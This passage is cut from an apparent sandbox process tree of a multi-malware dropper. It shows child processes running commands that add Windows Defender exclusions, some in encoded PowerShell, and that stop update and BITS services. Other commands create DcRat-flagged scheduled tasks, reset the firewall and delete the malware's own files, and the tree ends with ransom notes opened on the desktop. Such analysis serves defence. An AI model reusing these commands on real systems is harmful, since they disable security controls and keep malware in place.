                                            PID:4888
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c md 287228
                                            9⤵
                                              PID:7536
                                            • C:\Windows\SysWOW64\findstr.exe
                                              findstr /V "CupsRoseColdTemple" Dried
                                              9⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:7644
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c copy /b ..\Sean + ..\Personals + ..\Sisters + ..\Accurate + ..\Reforms + ..\Seeks + ..\Wide G
                                              9⤵
                                                PID:7692
                                              • C:\Users\Admin\AppData\Local\Temp\287228\Newbie.pif
                                                Newbie.pif G
                                                9⤵
                                                • Checks processor information in registry
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:2588
                                              • C:\Windows\SysWOW64\choice.exe
                                                choice /d y /t 5
                                                9⤵
                                                  PID:6676
                                        • C:\Windows\svchost.com
                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nxmr.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          PID:6536
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nxmr.exe
                                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nxmr.exe
                                            6⤵
                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                            • Executes dropped EXE
                                            PID:6624
                                        • C:\Windows\svchost.com
                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\r.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          PID:7016
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\r.exe
                                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\r.exe
                                            6⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:7116
                                        • C:\Windows\svchost.com
                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ChatLife.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          PID:6804
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ChatLife.exe
                                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ChatLife.exe
                                            6⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Modifies registry class
                                            PID:5972
                                            • C:\Windows\svchost.com
                                              "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
                                              7⤵
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              PID:664
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\System32\cmd.exe /c copy Confirmed Confirmed.cmd & Confirmed.cmd
                                                8⤵
                                                  PID:6528
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    9⤵
                                                      PID:4904
                                            • C:\Windows\svchost.com
                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C08D~1.EXE"
                                              5⤵
                                              • Drops file in Windows directory
                                              PID:8180
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C08D~1.EXE
                                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C08D~1.EXE
                                                6⤵
                                                • Suspicious use of SetThreadContext
                                                PID:6184
                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  7⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1600
                                            • C:\Windows\svchost.com
                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t.exe"
                                              5⤵
                                              • Drops file in Windows directory
                                              PID:6380
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t.exe
                                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t.exe
                                                6⤵
                                                • Adds Run key to start application
                                                PID:6376
                                                • C:\Windows\sysarddrvs.exe
                                                  C:\Windows\sysarddrvs.exe
                                                  7⤵
                                                  • Modifies security service
                                                  • Windows security bypass
                                                  • Checks computer location settings
                                                  • Windows security modification
                                                  • Modifies registry class
                                                  • Suspicious behavior: SetClipboardViewer
                                                  PID:7400
                                                  • C:\Windows\svchost.com
                                                    "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                    8⤵
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    PID:7864
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\System32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
                                                      9⤵
                                                        PID:1824
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
                                                          10⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:2964
                                                    • C:\Windows\svchost.com
                                                      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                                      8⤵
                                                      • Drops file in Windows directory
                                                      PID:7876
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                                        9⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:7976
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc stop UsoSvc
                                                          10⤵
                                                          • Launches sc.exe
                                                          PID:7140
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc stop WaaSMedicSvc
                                                          10⤵
                                                          • Launches sc.exe
                                                          PID:8024
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc stop wuauserv
                                                          10⤵
                                                          • Launches sc.exe
                                                          PID:7720
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc stop DoSvc
                                                          10⤵
                                                          • Launches sc.exe
                                                          • System Location Discovery: System Language Discovery
                                                          PID:8148
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc stop BITS
                                                          10⤵
                                                          • Launches sc.exe
                                                          PID:5228
                                                    • C:\Users\Admin\AppData\Local\Temp\1072413163.exe
                                                      C:\Users\Admin\AppData\Local\Temp\1072413163.exe
                                                      8⤵
                                                        PID:7060
                                                      • C:\Users\Admin\AppData\Local\Temp\2363111470.exe
                                                        C:\Users\Admin\AppData\Local\Temp\2363111470.exe
                                                        8⤵
                                                          PID:7816
                                                  • C:\Windows\svchost.com
                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\xxxx.exe"
                                                    5⤵
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6076
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\xxxx.exe
                                                      C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\xxxx.exe
                                                      6⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:6912
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        7⤵
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:7236
                                                  • C:\Windows\svchost.com
                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C1D0~1.EXE"
                                                    5⤵
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6836
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C1D0~1.EXE
                                                      C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C1D0~1.EXE
                                                      6⤵
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      PID:7224
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Checks processor information in registry
                                                        • Modifies registry class
                                                        PID:3464
                                                        • C:\Windows\svchost.com
                                                          "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\IECBGIDAEHCG" & exit
                                                          8⤵
                                                          • Drops file in Windows directory
                                                          PID:5860
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c timeout /t 10 & del /f /q C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe & rd /s /q C:\ProgramData\IECBGIDAEHCG & exit
                                                            9⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4168
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 10
                                                              10⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Delays execution with timeout.exe
                                                              PID:6084
                                                  • C:\Windows\svchost.com
                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\mimilove.exe"
                                                    5⤵
                                                      PID:6552
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\mimilove.exe
                                                        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\mimilove.exe
                                                        6⤵
                                                          PID:6348
                                                      • C:\Windows\svchost.com
                                                        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\conhost.exe"
                                                        5⤵
                                                          PID:6576
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\conhost.exe
                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\conhost.exe
                                                            6⤵
                                                            • Checks computer location settings
                                                            PID:5508
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                              7⤵
                                                                PID:4556
                                                                • C:\Windows\system32\mode.com
                                                                  mode 65,10
                                                                  8⤵
                                                                    PID:6496
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e file.zip -p29586644319935208542739921766 -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:6980
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_11.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:6996
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_10.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:1520
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_9.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:232
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_8.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:7524
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_7.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:6756
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_6.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:5016
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_5.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:2192
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_4.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:7536
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_3.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:7680
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_2.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:6964
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_1.zip -oextracted
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:7152
                                                                  • C:\Windows\system32\attrib.exe
                                                                    attrib +H "Installer.exe"
                                                                    8⤵
                                                                    • Views/modifies file attributes
                                                                    PID:7812
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
                                                                    "Installer.exe"
                                                                    8⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:7848
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      9⤵
                                                                        PID:2288
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "cmd.exe" /C powershell -EncodedCommand "PAAjAHEAQwBCAG0AdAB4AFoAUwBEADkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBaADMAdABMAGEATwBkAEMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFQAbwBKAHYAWgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                                                                          10⤵
                                                                          • Power Settings
                                                                          PID:5816
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -EncodedCommand "PAAjAHEAQwBCAG0AdAB4AFoAUwBEADkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBaADMAdABMAGEATwBkAEMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFQAbwBKAHYAWgAjAD4A"
                                                                            11⤵
                                                                              PID:7548
                                                                            • C:\Windows\SysWOW64\powercfg.exe
                                                                              powercfg /x -hibernate-timeout-ac 0
                                                                              11⤵
                                                                              • Power Settings
                                                                              PID:1600
                                                                            • C:\Windows\SysWOW64\powercfg.exe
                                                                              powercfg /x -hibernate-timeout-dc 0
                                                                              11⤵
                                                                              • Power Settings
                                                                              PID:7076
                                                                            • C:\Windows\SysWOW64\powercfg.exe
                                                                              powercfg /x -standby-timeout-ac 0
                                                                              11⤵
                                                                              • Power Settings
                                                                              PID:3768
                                                                            • C:\Windows\SysWOW64\powercfg.exe
                                                                              powercfg /x -standby-timeout-dc 0
                                                                              11⤵
                                                                              • Power Settings
                                                                              PID:3952
                                                                            • C:\Windows\SysWOW64\powercfg.exe
                                                                              powercfg /hibernate off
                                                                              11⤵
                                                                              • Power Settings
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3860
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                            10⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:7396
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                              11⤵
                                                                              • DcRat
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:1396
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3645" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                            10⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:7276
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3645" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                              11⤵
                                                                              • DcRat
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:7632
                                                                • C:\Windows\svchost.com
                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\REVERS~1.EXE"
                                                                  5⤵
                                                                  • Drops file in Windows directory
                                                                  PID:3768
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\REVERS~1.EXE
                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\REVERS~1.EXE
                                                                    6⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2996
                                                                • C:\Windows\svchost.com
                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1.exe"
                                                                  5⤵
                                                                  • Drops file in Windows directory
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:7476
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1.exe
                                                                    6⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:7120
                                                                • C:\Windows\svchost.com
                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\020820~1.EXE"
                                                                  5⤵
                                                                    PID:7944
                                                                  • C:\Windows\svchost.com
                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DECRYP~1.EXE"
                                                                    5⤵
                                                                      PID:7036
                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DECRYP~1.EXE
                                                                        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DECRYP~1.EXE
                                                                        6⤵
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5336
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                          7⤵
                                                                            PID:3780
                                                                      • C:\Windows\svchost.com
                                                                        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\AUTHEN~1.EXE"
                                                                        5⤵
                                                                        • Drops file in Windows directory
                                                                        PID:7040
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\AUTHEN~1.EXE
                                                                          C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\AUTHEN~1.EXE
                                                                          6⤵
                                                                            PID:1520
                                                                        • C:\Windows\svchost.com
                                                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SCHEDU~1.EXE"
                                                                          5⤵
                                                                          • Drops file in Windows directory
                                                                          PID:7108
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SCHEDU~1.EXE
                                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SCHEDU~1.EXE
                                                                            6⤵
                                                                              PID:5016
                                                                          • C:\Windows\svchost.com
                                                                            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t1.exe"
                                                                            5⤵
                                                                            • Drops file in Windows directory
                                                                            PID:5904
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t1.exe
                                                                              6⤵
                                                                                PID:7856
                                                                            • C:\Windows\svchost.com
                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t2.exe"
                                                                              5⤵
                                                                              • Drops file in Windows directory
                                                                              PID:7600
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t2.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\t2.exe
                                                                                6⤵
                                                                                  PID:7716
                                                                              • C:\Windows\svchost.com
                                                                                "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\newtpp.exe"
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4292
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\newtpp.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\newtpp.exe
                                                                                  6⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:6960
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
                                                                              "bot.exe"
                                                                              4⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Modifies system executable filetype association
                                                                              • Drops file in Program Files directory
                                                                              • Modifies registry class
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3304
                                                                              • C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
                                                                                5⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Drops autorun.inf file
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5096
                                                                                • C:\Windows\svchost.com
                                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Windows directory
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4112
                                                                                  • C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
                                                                                    C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
                                                                                    7⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Modifies registry class
                                                                                    PID:5144
                                                                                    • C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
                                                                                      C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      PID:5312
                                                                                      • C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
                                                                                        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5788
                                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                          "C:\Program Files\Internet Explorer\iexplore.exe"
                                                                                          10⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:3464
                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:17410 /prefetch:2
                                                                                            11⤵
                                                                                            • Modifies Internet Explorer settings
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:4028
                                                                                      • C:\Program Files (x86)\Microsoft\DesktopLayer.exe
                                                                                        "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5808
                                                                                        • C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
                                                                                          "C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
                                                                                          10⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Program Files directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:668
                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe"
                                                                                            11⤵
                                                                                            • Modifies Internet Explorer settings
                                                                                            PID:5608
                                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                          "C:\Program Files\Internet Explorer\iexplore.exe"
                                                                                          10⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:1600
                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1600 CREDAT:17410 /prefetch:2
                                                                                            11⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Modifies Internet Explorer settings
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5856
                                                                                    • C:\Windows\svchost.com
                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\F359.tmp\splitterrypted.vbs
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:6096
                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\F359.tmp\splitterrypted.vbs
                                                                                        9⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5752
                                                                                • C:\Windows\svchost.com
                                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:5580
                                                                                  • C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
                                                                                    C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
                                                                                    7⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Modifies registry class
                                                                                    PID:5872
                                                                                    • C:\Windows\svchost.com
                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\spwak.vbs
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Windows directory
                                                                                      PID:5272
                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\spwak.vbs
                                                                                        9⤵
                                                                                          PID:5920
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
                                                                                4⤵
                                                                                • Checks computer location settings
                                                                                • Drops startup file
                                                                                • Executes dropped EXE
                                                                                • Enumerates connected drives
                                                                                • Drops file in System32 directory
                                                                                • Sets desktop wallpaper using registry
                                                                                • Drops file in Program Files directory
                                                                                • Drops file in Windows directory
                                                                                • Modifies registry class
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1432
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                  5⤵
                                                                                  • Modifies Windows Firewall
                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                  PID:1600
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  C:\Windows\system32\netsh.exe advfirewall reset
                                                                                  5⤵
                                                                                  • Modifies Windows Firewall
                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2164
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___W4WM_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                  5⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2692
                                                                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___D1KG_.txt
                                                                                  5⤵
                                                                                  • Opens file in notepad (likely ransom note)
                                                                                  PID:2980
                                                                                • C:\Windows\svchost.com
